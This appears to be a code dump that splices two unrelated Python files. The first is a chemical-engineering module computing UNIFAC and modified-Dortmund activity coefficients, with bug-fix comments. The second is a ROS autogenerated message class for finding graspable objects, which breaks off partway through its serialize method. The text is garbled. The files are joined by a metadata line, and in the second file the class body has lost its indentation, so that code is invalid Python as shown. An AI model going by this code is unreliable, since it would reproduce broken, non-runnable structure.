            teta_k.append(teta(k))
        activity_R = [] #Residual part for activity coefficient ln gammaR
        for i in range(0,len(cs)):
            ln_gamma_R = 0
            for k in group_names:
                vk = 0
                for t in groupk[k][0]:
                    if t[0] == i:
                        vk = t[1]
                Qk = groupk[k][2]
                kk = group_names.index(k)
                nom = 0; aux = 0
                nom_i = 0; aux_i = 0
                for m in group_names:
                    denom_i = 0; denom = 0
                    mm = group_names.index(m)
                    for n in group_names:
                        nn = group_names.index(n)
                        denom += teta_k[nn]*taus[(n,m)]
                        denom_i += teta_ki[i][nn]*taus[(n,m)]
                    nom += teta_k[mm]*taus[(k,m)]/denom
                    aux += teta_k[mm]*taus[(m,k)]
                    nom_i += teta_ki[i][mm]*taus[(k,m)]/denom_i
                    aux_i += teta_ki[i][mm]*taus[(m,k)]
                ln_gamma_k = Qk*(1- log(aux) - nom )
                ln_gamma_ki = Qk*(1- log(aux_i) - nom_i )
                ln_gamma_R += vk*(ln_gamma_k - ln_gamma_ki)
            activity_R.append(ln_gamma_R)
        activity_C = []
        #Gamma combinatorial for components
        V = []; F = []; Vp = [] # V' modified dortmund
        for i in range (0,len(cs)):
            aux_r = 0; aux_q = 0; aux_rp = 0
            for j in range(0,len(cs)):
                aux_r += r[j]*x[j]
                aux_rp += (r[j]**0.75)*x[j]
                aux_q += q[j]*x[j]
            V.append(r[i]/aux_r)
            Vp.append((r[i]**0.75)/aux_rp)
            F.append(q[i]/aux_q)
        for i in range(0, len(cs)):
            aux = 1 - Vp[i]+ log(Vp[i]) - 5*q[i]*( 1- V[i]/F[i]+ log(V[i]/F[i]) )
            activity_C.append(aux)
        activity_coefficients = []
        for i in range(0,len(cs)):
            activity_coefficients.append( exp(activity_C[i] + activity_R[i]) )
        return activity_coefficients, taus
class Unifac():
    """Unifac model activity coefficient"""
    def gamma(components,temperature,fractions):
        """Liquid-phase activity coefficients via original UNIFAC.

        :param components: component objects exposing ``UnifacVLE``
            (subgroup id, count) pairs
        :param temperature: system temperature [K]
        :param fractions: liquid mole fractions, one per component
        :return: (activity_coefficients, taus) where ``taus`` maps subgroup
            pairs to the group-interaction terms exp(-a_mn/T)
        """
        cs = components
        T = temperature
        # BUGFIX: the original loop (`for item in x: item = 1E-05`) rebound
        # only the loop variable, so zero fractions were never replaced and
        # later caused log(0)/ZeroDivisionError. Sanitize into a copy.
        x = [1E-05 if item == 0 else item for item in fractions]
        # Get Q and R values for groups
        groupi = []; groupk = {}; ip = {}
        file_path = MODELS_URL+"unifac.txt"
        with open(file_path, 'r') as f:
            lines = f.readlines()
        for i in range(0,len(cs)):
            groups = cs[i].UnifacVLE
            rk_data = []
            for pair in groups:
                for line in lines:
                    aux = line.split(',')
                    if aux[1] == str(pair[0]):
                        ip[pair[0]] = int(aux[0]) # subgroup -> main group id
                        if pair[0] in groupk.keys():
                            groupk[pair[0]][0].append((i,pair[1]))
                        else:
                            groupk[pair[0]] = ([(i, pair[1])], float(aux[4]), float(aux[5]))
                        rk_data.append( (pair[0], pair[1], float(aux[4]), float(aux[5])) )
                        break
            groupi.append(rk_data)
        #Calculate r and q values for components
        r = []; q = []
        for i in range(0,len(cs)):
            ri = 0; qi = 0
            for data in groupi[i]:
                ri += data[1]*data[2]
                qi += data[1]*data[3]
            r.append(ri)
            q.append(qi)
        # Calculation of residual and combinatorial parts
        # ln gamma_k = Qk*[ 1-log(sum(tetai*taui,k)) - sum [ (tetai*taui,m)/sum(tetaj*tauj,m)]
        # Calculate activity coefficients for each group
        group_names = [] # Get group numbers
        for key in groupk.keys():
            group_names.append(key)
        def X(k):
            """Calculates group fraction for k"""
            aux_group = groupk[k]
            aux1 = 0; aux2 = 0
            for item in aux_group[0]: #Item = (i, vi)
                vk = item[1]; i = item[0]
                aux1 += vk*x[i]
            for index in group_names:
                aux_grp = groupk[index][0]
                for itm in aux_grp:
                    aux2 += x[itm[0]]*itm[1]
            return aux1/aux2
        def tau(m,n):
            """Group-interaction term exp(-a_mn/T) from unifac_ip.txt."""
            if m == n:
                return 1
            else:
                file_name = MODELS_URL+"unifac_ip.txt"
                found = False
                m = ip[m]; n = ip[n] # map subgroups to main-group ids
                if m == n:
                    # BUGFIX (consistency with Dortmund): subgroups sharing a
                    # main group have zero interaction energy, so tau = 1
                    # instead of the warn-and-default path.
                    return 1
                with open(file_name, 'r') as f:
                    lines = f.readlines()
                for line in lines:
                    line = line.split("\t")
                    if int(line[0]) == m and int(line[2]) == n:
                        aij = float(line[4]); found = True
                    # BUGFIX: this branch originally duplicated the condition
                    # above (unreachable); the reverse direction is (n, m) and
                    # reads column 5, mirroring the Dortmund implementation.
                    elif int(line[0]) == n and int(line[2]) == m:
                        aij = float(line[5]); found = True
                if found:
                    return exp(-aij/T)
                else:
                    print("WARNING! No UNIFAC interaction parameters were found for groups",m,n)
                    return exp(-50/T) #default value
        taus = {}
        for m in group_names:
            for n in group_names:
                taus[(m,n)] = tau(m,n)
        Xk = [] #Calculate and store Xk values
        for k in group_names:
            Xk.append(X(k))
        Xi = [] #Calculate and store Xk values for pure components
        def X2(k, xi):
            """Calculates group fraction for k"""
            aux_group = groupk[k]
            aux1 = 0; aux2 = 0
            for item in aux_group[0]: #Item = (i, vi)
                vk = item[1]; i = item[0]
                aux1 += vk*xi[i]
            for index in group_names:
                aux_grp = groupk[index][0]
                for itm in aux_grp:
                    aux2 += xi[itm[0]]*itm[1]
            return aux1/aux2
        def teta(k):
            """Teta value for group m"""
            Qk = groupk[k][2]
            kk = group_names.index(k)
            aux = 0
            for n in group_names:
                nk = group_names.index(n)
                Qn = groupk[n][2]
                aux += Qn*Xk[nk]
            tet = groupk[k][2]*Xk[kk]/aux
            return tet
        for i in range(0,len(cs)):
            ki = []
            for k in group_names:
                xi = x.copy()
                for j in range(0,len(xi)):
                    if i==j:
                        xi[j] = 1
                    else:
                        xi[j] = 0
                ki.append( X2(k,xi) )
            Xi.append(ki)
        def tetai(k, i):
            """Teta value for group m in pure component"""
            Qk = groupk[k][2]
            kk = group_names.index(k)
            aux = 0
            for n in group_names:
                nk = group_names.index(n)
                Qn = groupk[n][2]
                aux += Qn*Xi[i][nk]
            teti = groupk[k][2]*Xi[i][kk]/aux
            return teti
        teta_k = []; teta_ki = []
        for i in range(0,len(cs)):
            pure_k = []
            for k in group_names:
                pure_k.append(tetai(k,i))
            teta_ki.append(pure_k)
        for k in group_names:
            teta_k.append(teta(k))
        activity_R = [] #Residual part for activity coefficient ln gammaR
        for i in range(0,len(cs)):
            ln_gamma_R = 0
            for k in group_names:
                vk = 0
                for t in groupk[k][0]:
                    if t[0] == i:
                        vk = t[1]
                Qk = groupk[k][2]
                kk = group_names.index(k)
                nom = 0; aux = 0
                nom_i = 0; aux_i = 0
                for m in group_names:
                    denom_i = 0; denom = 0
                    mm = group_names.index(m)
                    for n in group_names:
                        nn = group_names.index(n)
                        denom += teta_k[nn]*taus[(n,m)]
                        denom_i += teta_ki[i][nn]*taus[(n,m)]
                    nom += teta_k[mm]*taus[(k,m)]/denom
                    aux += teta_k[mm]*taus[(m,k)]
                    nom_i += teta_ki[i][mm]*taus[(k,m)]/denom_i
                    aux_i += teta_ki[i][mm]*taus[(m,k)]
                ln_gamma_k = Qk*(1- log(aux) - nom )
                ln_gamma_ki = Qk*(1- log(aux_i) - nom_i )
                ln_gamma_R += vk*(ln_gamma_k - ln_gamma_ki)
            activity_R.append(ln_gamma_R)
        activity_C = []
        #Gamma combinatorial for components
        V = []; F = []
        for i in range (0,len(cs)):
            aux_r = 0; aux_q = 0
            for j in range(0,len(cs)):
                aux_r += r[j]*x[j]
                aux_q += q[j]*x[j]
            V.append(r[i]/aux_r)
            F.append(q[i]/aux_q)
        for i in range(0, len(cs)):
            aux = 1 - V[i]+ log(V[i]) - 5*q[i]*( 1- V[i]/F[i]+ log(V[i]/F[i]) )
            activity_C.append(aux)
        activity_coefficients = []
        for i in range(0,len(cs)):
            activity_coefficients.append( exp(activity_C[i] + activity_R[i]) )
        # BUGFIX: removed leftover debug `print(taus)` that spammed stdout on
        # every call.
        return activity_coefficients, taus
7c6a9e2ec98b83d982e00ca6b1061813672774c1 | 181,207 | py | Python | catkin_ws/devel/lib/python2.7/dist-packages/grasping_msgs/msg/_FindGraspableObjectsAction.py | RHolmewood/FetchRobot_Project2 | c096dd4bf88691d893010e95074f5c53baac37bc | [
"MIT"
] | null | null | null | catkin_ws/devel/lib/python2.7/dist-packages/grasping_msgs/msg/_FindGraspableObjectsAction.py | RHolmewood/FetchRobot_Project2 | c096dd4bf88691d893010e95074f5c53baac37bc | [
"MIT"
] | null | null | null | catkin_ws/devel/lib/python2.7/dist-packages/grasping_msgs/msg/_FindGraspableObjectsAction.py | RHolmewood/FetchRobot_Project2 | c096dd4bf88691d893010e95074f5c53baac37bc | [
"MIT"
] | null | null | null | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from grasping_msgs/FindGraspableObjectsAction.msg. Do not edit."""
import codecs
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import actionlib_msgs.msg
import genpy
import geometry_msgs.msg
import grasping_msgs.msg
import moveit_msgs.msg
import sensor_msgs.msg
import shape_msgs.msg
import std_msgs.msg
import trajectory_msgs.msg
class FindGraspableObjectsAction(genpy.Message):
_md5sum = "ee328bdfce4619bf201b406a666b5877"
_type = "grasping_msgs/FindGraspableObjectsAction"
_has_header = False # flag to mark the presence of a Header object
_full_text = """# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
FindGraspableObjectsActionGoal action_goal
FindGraspableObjectsActionResult action_result
FindGraspableObjectsActionFeedback action_feedback
================================================================================
MSG: grasping_msgs/FindGraspableObjectsActionGoal
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
Header header
actionlib_msgs/GoalID goal_id
FindGraspableObjectsGoal goal
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
string frame_id
================================================================================
MSG: actionlib_msgs/GoalID
# The stamp should store the time at which this goal was requested.
# It is used by an action server when it tries to preempt all
# goals that were requested before a certain time
time stamp
# The id provides a way to associate feedback and
# result message with specific goal requests. The id
# specified must be unique.
string id
================================================================================
MSG: grasping_msgs/FindGraspableObjectsGoal
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
###########################################################
# This action is called for integrated object detection and
# grasp planning, such as in base_grasping_perception
# Set to false to disable grasp planning, returning only the objects found
bool plan_grasps
================================================================================
MSG: grasping_msgs/FindGraspableObjectsActionResult
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
Header header
actionlib_msgs/GoalStatus status
FindGraspableObjectsResult result
================================================================================
MSG: actionlib_msgs/GoalStatus
GoalID goal_id
uint8 status
uint8 PENDING = 0 # The goal has yet to be processed by the action server
uint8 ACTIVE = 1 # The goal is currently being processed by the action server
uint8 PREEMPTED = 2 # The goal received a cancel request after it started executing
# and has since completed its execution (Terminal State)
uint8 SUCCEEDED = 3 # The goal was achieved successfully by the action server (Terminal State)
uint8 ABORTED = 4 # The goal was aborted during execution by the action server due
# to some failure (Terminal State)
uint8 REJECTED = 5 # The goal was rejected by the action server without being processed,
# because the goal was unattainable or invalid (Terminal State)
uint8 PREEMPTING = 6 # The goal received a cancel request after it started executing
# and has not yet completed execution
uint8 RECALLING = 7 # The goal received a cancel request before it started executing,
# but the action server has not yet confirmed that the goal is canceled
uint8 RECALLED = 8 # The goal received a cancel request before it started executing
# and was successfully cancelled (Terminal State)
uint8 LOST = 9 # An action client can determine that a goal is LOST. This should not be
# sent over the wire by an action server
#Allow for the user to associate a string with GoalStatus for debugging
string text
================================================================================
MSG: grasping_msgs/FindGraspableObjectsResult
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
# Graspable objects found
GraspableObject[] objects
# Additional, non-graspable objects which may be support surfaces
Object[] support_surfaces
================================================================================
MSG: grasping_msgs/GraspableObject
###########################################################
# This message describes an object + grasp data
Object object
moveit_msgs/Grasp[] grasps
================================================================================
MSG: grasping_msgs/Object
###########################################################
# This message describes an object.
# Many of the geometric items below lack a stamp/frame_id,
# header stamp/frame_id should be used there
std_msgs/Header header
# An object might have a name
string name
# An object might have a known (named) support surface
string support_surface
# Objects might have properties, such as type/class, or color, etc.
ObjectProperty[] properties
###########################################################
# Objects have many possible descriptions
# The following are the possible description formats
# Perception modules often represent an object as a cluster of points
# Is considered valid if number of points > 0
sensor_msgs/PointCloud2 point_cluster
# MoveIt prefers solid primitives or meshes as a description of objects
shape_msgs/SolidPrimitive[] primitives
geometry_msgs/Pose[] primitive_poses
shape_msgs/Mesh[] meshes
geometry_msgs/Pose[] mesh_poses
# An object representing a support surface might be described by a plane
# Is considered valid if coefficients are not all 0s.
shape_msgs/Plane surface
================================================================================
MSG: grasping_msgs/ObjectProperty
###########################################################
# Other generic properties of an object
string name
string value
================================================================================
MSG: sensor_msgs/PointCloud2
# This message holds a collection of N-dimensional points, which may
# contain additional information such as normals, intensity, etc. The
# point data is stored as a binary blob, its layout described by the
# contents of the "fields" array.
# The point cloud data may be organized 2d (image-like) or 1d
# (unordered). Point clouds organized as 2d images may be produced by
# camera depth sensors such as stereo or time-of-flight.
# Time of sensor data acquisition, and the coordinate frame ID (for 3d
# points).
Header header
# 2D structure of the point cloud. If the cloud is unordered, height is
# 1 and width is the length of the point cloud.
uint32 height
uint32 width
# Describes the channels and their layout in the binary data blob.
PointField[] fields
bool is_bigendian # Is this data bigendian?
uint32 point_step # Length of a point in bytes
uint32 row_step # Length of a row in bytes
uint8[] data # Actual point data, size is (row_step*height)
bool is_dense # True if there are no invalid points
================================================================================
MSG: sensor_msgs/PointField
# This message holds the description of one point entry in the
# PointCloud2 message format.
uint8 INT8 = 1
uint8 UINT8 = 2
uint8 INT16 = 3
uint8 UINT16 = 4
uint8 INT32 = 5
uint8 UINT32 = 6
uint8 FLOAT32 = 7
uint8 FLOAT64 = 8
string name # Name of field
uint32 offset # Offset from start of point struct
uint8 datatype # Datatype enumeration, see above
uint32 count # How many elements in the field
================================================================================
MSG: shape_msgs/SolidPrimitive
# Define box, sphere, cylinder, cone
# All shapes are defined to have their bounding boxes centered around 0,0,0.
uint8 BOX=1
uint8 SPHERE=2
uint8 CYLINDER=3
uint8 CONE=4
# The type of the shape
uint8 type
# The dimensions of the shape
float64[] dimensions
# The meaning of the shape dimensions: each constant defines the index in the 'dimensions' array
# For the BOX type, the X, Y, and Z dimensions are the length of the corresponding
# sides of the box.
uint8 BOX_X=0
uint8 BOX_Y=1
uint8 BOX_Z=2
# For the SPHERE type, only one component is used, and it gives the radius of
# the sphere.
uint8 SPHERE_RADIUS=0
# For the CYLINDER and CONE types, the center line is oriented along
# the Z axis. Therefore the CYLINDER_HEIGHT (CONE_HEIGHT) component
# of dimensions gives the height of the cylinder (cone). The
# CYLINDER_RADIUS (CONE_RADIUS) component of dimensions gives the
# radius of the base of the cylinder (cone). Cone and cylinder
# primitives are defined to be circular. The tip of the cone is
# pointing up, along +Z axis.
uint8 CYLINDER_HEIGHT=0
uint8 CYLINDER_RADIUS=1
uint8 CONE_HEIGHT=0
uint8 CONE_RADIUS=1
================================================================================
MSG: geometry_msgs/Pose
# A representation of pose in free space, composed of position and orientation.
Point position
Quaternion orientation
================================================================================
MSG: geometry_msgs/Point
# This contains the position of a point in free space
float64 x
float64 y
float64 z
================================================================================
MSG: geometry_msgs/Quaternion
# This represents an orientation in free space in quaternion form.
float64 x
float64 y
float64 z
float64 w
================================================================================
MSG: shape_msgs/Mesh
# Definition of a mesh
# list of triangles; the index values refer to positions in vertices[]
MeshTriangle[] triangles
# the actual vertices that make up the mesh
geometry_msgs/Point[] vertices
================================================================================
MSG: shape_msgs/MeshTriangle
# Definition of a triangle's vertices
uint32[3] vertex_indices
================================================================================
MSG: shape_msgs/Plane
# Representation of a plane, using the plane equation ax + by + cz + d = 0
# a := coef[0]
# b := coef[1]
# c := coef[2]
# d := coef[3]
float64[4] coef
================================================================================
MSG: moveit_msgs/Grasp
# This message contains a description of a grasp that would be used
# with a particular end-effector to grasp an object, including how to
# approach it, grip it, etc. This message does not contain any
# information about a "grasp point" (a position ON the object).
# Whatever generates this message should have already combined
# information about grasp points with information about the geometry
# of the end-effector to compute the grasp_pose in this message.
# A name for this grasp
string id
# The internal posture of the hand for the pre-grasp
# only positions are used
trajectory_msgs/JointTrajectory pre_grasp_posture
# The internal posture of the hand for the grasp
# positions and efforts are used
trajectory_msgs/JointTrajectory grasp_posture
# The position of the end-effector for the grasp. This is the pose of
# the "parent_link" of the end-effector, not actually the pose of any
# link *in* the end-effector. Typically this would be the pose of the
# most distal wrist link before the hand (end-effector) links began.
geometry_msgs/PoseStamped grasp_pose
# The estimated probability of success for this grasp, or some other
# measure of how "good" it is.
float64 grasp_quality
# The approach direction to take before picking an object
GripperTranslation pre_grasp_approach
# The retreat direction to take after a grasp has been completed (object is attached)
GripperTranslation post_grasp_retreat
# The retreat motion to perform when releasing the object; this information
# is not necessary for the grasp itself, but when releasing the object,
# the information will be necessary. The grasp used to perform a pickup
# is returned as part of the result, so this information is available for
# later use.
GripperTranslation post_place_retreat
# the maximum contact force to use while grasping (<=0 to disable)
float32 max_contact_force
# an optional list of obstacles that we have semantic information about
# and that can be touched/pushed/moved in the course of grasping
string[] allowed_touch_objects
================================================================================
MSG: trajectory_msgs/JointTrajectory
Header header
string[] joint_names
JointTrajectoryPoint[] points
================================================================================
MSG: trajectory_msgs/JointTrajectoryPoint
# Each trajectory point specifies either positions[, velocities[, accelerations]]
# or positions[, effort] for the trajectory to be executed.
# All specified values are in the same order as the joint names in JointTrajectory.msg
float64[] positions
float64[] velocities
float64[] accelerations
float64[] effort
duration time_from_start
================================================================================
MSG: geometry_msgs/PoseStamped
# A Pose with reference coordinate frame and timestamp
Header header
Pose pose
================================================================================
MSG: moveit_msgs/GripperTranslation
# defines a translation for the gripper, used in pickup or place tasks
# for example for lifting an object off a table or approaching the table for placing
# the direction of the translation
geometry_msgs/Vector3Stamped direction
# the desired translation distance
float32 desired_distance
# the min distance that must be considered feasible before the
# grasp is even attempted
float32 min_distance
================================================================================
MSG: geometry_msgs/Vector3Stamped
# This represents a Vector3 with reference coordinate frame and timestamp
Header header
Vector3 vector
================================================================================
MSG: geometry_msgs/Vector3
# This represents a vector in free space.
# It is only meant to represent a direction. Therefore, it does not
# make sense to apply a translation to it (e.g., when applying a
# generic rigid transformation to a Vector3, tf2 will only apply the
# rotation). If you want your data to be translatable too, use the
# geometry_msgs/Point message instead.
float64 x
float64 y
float64 z
================================================================================
MSG: grasping_msgs/FindGraspableObjectsActionFeedback
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
Header header
actionlib_msgs/GoalStatus status
FindGraspableObjectsFeedback feedback
================================================================================
MSG: grasping_msgs/FindGraspableObjectsFeedback
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
# Publish objects as they are detected and grasp planned
GraspableObject object
"""
__slots__ = ['action_goal','action_result','action_feedback']
_slot_types = ['grasping_msgs/FindGraspableObjectsActionGoal','grasping_msgs/FindGraspableObjectsActionResult','grasping_msgs/FindGraspableObjectsActionFeedback']
def __init__(self, *args, **kwds):
    """
    Constructor. Any message fields that are implicitly/explicitly
    set to None will be assigned a default value. The recommend
    use is keyword arguments as this is more robust to future message
    changes. You cannot mix in-order arguments and keyword arguments.

    The available fields are:
       action_goal,action_result,action_feedback

    :param args: complete set of field values, in .msg order
    :param kwds: use keyword arguments corresponding to message field names
    to set specific fields.
    """
    if args or kwds:
        # Delegate positional/keyword assignment to the genpy base class;
        # any field the caller omitted comes back as None.
        super(FindGraspableObjectsAction, self).__init__(*args, **kwds)
    else:
        # No arguments at all: start every slot out empty so the
        # default-filling pass below applies uniformly.
        self.action_goal = None
        self.action_result = None
        self.action_feedback = None
    # Message fields must never be None -- replace any unset field with a
    # default-constructed sub-message.
    if self.action_goal is None:
        self.action_goal = grasping_msgs.msg.FindGraspableObjectsActionGoal()
    if self.action_result is None:
        self.action_result = grasping_msgs.msg.FindGraspableObjectsActionResult()
    if self.action_feedback is None:
        self.action_feedback = grasping_msgs.msg.FindGraspableObjectsActionFeedback()
def _get_types(self):
    """
    internal API method

    :returns: the list of ROS type strings for this message's slots
    """
    # Simply expose the class-level _slot_types list.
    return self._slot_types
def serialize(self, buff):
    """
    serialize message into buffer

    Writes the wire representation of this action message (action_goal,
    action_result, action_feedback -- in that fixed order) into *buff*.
    Strings are length-prefixed with a little-endian uint32; fixed-size
    numeric groups use the precompiled ``_get_struct_*`` helpers.

    :param buff: buffer, ``StringIO``
    """
    try:
        # --- action_goal: header, goal_id, then the goal itself ---
        _x = self
        buff.write(_get_struct_3I().pack(_x.action_goal.header.seq, _x.action_goal.header.stamp.secs, _x.action_goal.header.stamp.nsecs))
        _x = self.action_goal.header.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
        _x = self
        buff.write(_get_struct_2I().pack(_x.action_goal.goal_id.stamp.secs, _x.action_goal.goal_id.stamp.nsecs))
        _x = self.action_goal.goal_id.id
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
        # goal.plan_grasps (bool as B) is packed together with the start of
        # the action_result header to match the generated wire layout.
        _x = self
        buff.write(_get_struct_B3I().pack(_x.action_goal.goal.plan_grasps, _x.action_result.header.seq, _x.action_result.header.stamp.secs, _x.action_result.header.stamp.nsecs))
        # --- action_result: header + GoalStatus ---
        _x = self.action_result.header.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
        _x = self
        buff.write(_get_struct_2I().pack(_x.action_result.status.goal_id.stamp.secs, _x.action_result.status.goal_id.stamp.nsecs))
        _x = self.action_result.status.goal_id.id
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
        _x = self.action_result.status.status
        buff.write(_get_struct_B().pack(_x))
        _x = self.action_result.status.text
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
        # --- action_result.result.objects: GraspableObject[] ---
        length = len(self.action_result.result.objects)
        buff.write(_struct_I.pack(length))
        for val1 in self.action_result.result.objects:
            # val1.object is a grasping_msgs/Object
            _v1 = val1.object
            _v2 = _v1.header
            _x = _v2.seq
            buff.write(_get_struct_I().pack(_x))
            _v3 = _v2.stamp
            _x = _v3
            buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
            _x = _v2.frame_id
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            _x = _v1.name
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            _x = _v1.support_surface
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            length = len(_v1.properties)
            buff.write(_struct_I.pack(length))
            for val3 in _v1.properties:
                _x = val3.name
                length = len(_x)
                if python3 or type(_x) == unicode:
                    _x = _x.encode('utf-8')
                    length = len(_x)
                buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
                _x = val3.value
                length = len(_x)
                if python3 or type(_x) == unicode:
                    _x = _x.encode('utf-8')
                    length = len(_x)
                buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            # point_cluster: sensor_msgs/PointCloud2
            _v4 = _v1.point_cluster
            _v5 = _v4.header
            _x = _v5.seq
            buff.write(_get_struct_I().pack(_x))
            _v6 = _v5.stamp
            _x = _v6
            buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
            _x = _v5.frame_id
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            _x = _v4
            buff.write(_get_struct_2I().pack(_x.height, _x.width))
            length = len(_v4.fields)
            buff.write(_struct_I.pack(length))
            for val4 in _v4.fields:
                _x = val4.name
                length = len(_x)
                if python3 or type(_x) == unicode:
                    _x = _x.encode('utf-8')
                    length = len(_x)
                buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
                _x = val4
                buff.write(_get_struct_IBI().pack(_x.offset, _x.datatype, _x.count))
            _x = _v4
            buff.write(_get_struct_B2I().pack(_x.is_bigendian, _x.point_step, _x.row_step))
            _x = _v4.data
            length = len(_x)
            # - if encoded as a list instead, serialize as bytes instead of string
            if type(_x) in [list, tuple]:
                buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))
            else:
                buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            _x = _v4.is_dense
            buff.write(_get_struct_B().pack(_x))
            # solid primitives + their poses
            length = len(_v1.primitives)
            buff.write(_struct_I.pack(length))
            for val3 in _v1.primitives:
                _x = val3.type
                buff.write(_get_struct_B().pack(_x))
                length = len(val3.dimensions)
                buff.write(_struct_I.pack(length))
                pattern = '<%sd'%length
                buff.write(struct.Struct(pattern).pack(*val3.dimensions))
            length = len(_v1.primitive_poses)
            buff.write(_struct_I.pack(length))
            for val3 in _v1.primitive_poses:
                _v7 = val3.position
                _x = _v7
                buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
                _v8 = val3.orientation
                _x = _v8
                buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
            # meshes + their poses
            length = len(_v1.meshes)
            buff.write(_struct_I.pack(length))
            for val3 in _v1.meshes:
                length = len(val3.triangles)
                buff.write(_struct_I.pack(length))
                for val4 in val3.triangles:
                    buff.write(_get_struct_3I().pack(*val4.vertex_indices))
                length = len(val3.vertices)
                buff.write(_struct_I.pack(length))
                for val4 in val3.vertices:
                    _x = val4
                    buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
            length = len(_v1.mesh_poses)
            buff.write(_struct_I.pack(length))
            for val3 in _v1.mesh_poses:
                _v9 = val3.position
                _x = _v9
                buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
                _v10 = val3.orientation
                _x = _v10
                buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
            # surface plane coefficients (4 doubles)
            _v11 = _v1.surface
            buff.write(_get_struct_4d().pack(*_v11.coef))
            # grasps attached to this object: moveit_msgs/Grasp[]
            length = len(val1.grasps)
            buff.write(_struct_I.pack(length))
            for val2 in val1.grasps:
                _x = val2.id
                length = len(_x)
                if python3 or type(_x) == unicode:
                    _x = _x.encode('utf-8')
                    length = len(_x)
                buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
                # pre_grasp_posture: trajectory_msgs/JointTrajectory
                _v12 = val2.pre_grasp_posture
                _v13 = _v12.header
                _x = _v13.seq
                buff.write(_get_struct_I().pack(_x))
                _v14 = _v13.stamp
                _x = _v14
                buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
                _x = _v13.frame_id
                length = len(_x)
                if python3 or type(_x) == unicode:
                    _x = _x.encode('utf-8')
                    length = len(_x)
                buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
                length = len(_v12.joint_names)
                buff.write(_struct_I.pack(length))
                for val4 in _v12.joint_names:
                    length = len(val4)
                    if python3 or type(val4) == unicode:
                        val4 = val4.encode('utf-8')
                        length = len(val4)
                    buff.write(struct.Struct('<I%ss'%length).pack(length, val4))
                length = len(_v12.points)
                buff.write(_struct_I.pack(length))
                for val4 in _v12.points:
                    length = len(val4.positions)
                    buff.write(_struct_I.pack(length))
                    pattern = '<%sd'%length
                    buff.write(struct.Struct(pattern).pack(*val4.positions))
                    length = len(val4.velocities)
                    buff.write(_struct_I.pack(length))
                    pattern = '<%sd'%length
                    buff.write(struct.Struct(pattern).pack(*val4.velocities))
                    length = len(val4.accelerations)
                    buff.write(_struct_I.pack(length))
                    pattern = '<%sd'%length
                    buff.write(struct.Struct(pattern).pack(*val4.accelerations))
                    length = len(val4.effort)
                    buff.write(_struct_I.pack(length))
                    pattern = '<%sd'%length
                    buff.write(struct.Struct(pattern).pack(*val4.effort))
                    # duration uses signed 2i, unlike the unsigned time stamps
                    _v15 = val4.time_from_start
                    _x = _v15
                    buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
                # grasp_posture: trajectory_msgs/JointTrajectory
                _v16 = val2.grasp_posture
                _v17 = _v16.header
                _x = _v17.seq
                buff.write(_get_struct_I().pack(_x))
                _v18 = _v17.stamp
                _x = _v18
                buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
                _x = _v17.frame_id
                length = len(_x)
                if python3 or type(_x) == unicode:
                    _x = _x.encode('utf-8')
                    length = len(_x)
                buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
                length = len(_v16.joint_names)
                buff.write(_struct_I.pack(length))
                for val4 in _v16.joint_names:
                    length = len(val4)
                    if python3 or type(val4) == unicode:
